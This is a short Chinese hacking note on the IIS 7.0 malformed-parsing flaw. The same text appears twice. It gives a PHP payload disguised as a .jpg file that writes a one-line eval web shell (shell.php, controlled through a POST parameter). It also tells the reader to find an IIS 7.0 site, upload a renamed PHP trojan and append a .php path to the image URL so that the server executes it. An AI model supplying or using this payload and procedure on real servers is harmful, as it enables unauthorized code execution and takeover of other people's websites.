IIS7.0 畸形解析
1.jpg 内容
“<?fputs(fopen(“shell.PHP”,”w”),”<?eval(\$_POST[akt]);?>”)?>”
www.xxxx.com/upload/1.jpg
www.xxxx.com/upload/1.jpg/shell.php 访问后生成下面的一句话
www.xxxx.com/upload/shell.php
IIS7.0的畸形解析和这个类似。
找到某个使用IIS7.0架设的站,把PHP大马后缀改成.jpg,传上去,得到图片地址。
在图片格式后面添加xx.php随便你怎么填。只要后缀为.php就好.
“<?fputs(fopen(“shell.PHP”,”w”),”<?eval(\$_POST[akt]);?>”)?>”
www.xxxx.com/upload/1.jpg
www.xxxx.com/upload/1.jpg/shell.php 访问后生成下面的一句话
www.xxxx.com/upload/shell.php
IIS7.0的畸形解析和这个类似。
找到某个使用IIS7.0架设的站,把PHP大马后缀改成.jpg,传上去,得到图片地址。
在图片格式后面添加xx.php随便你怎么填。只要后缀为.php就好.
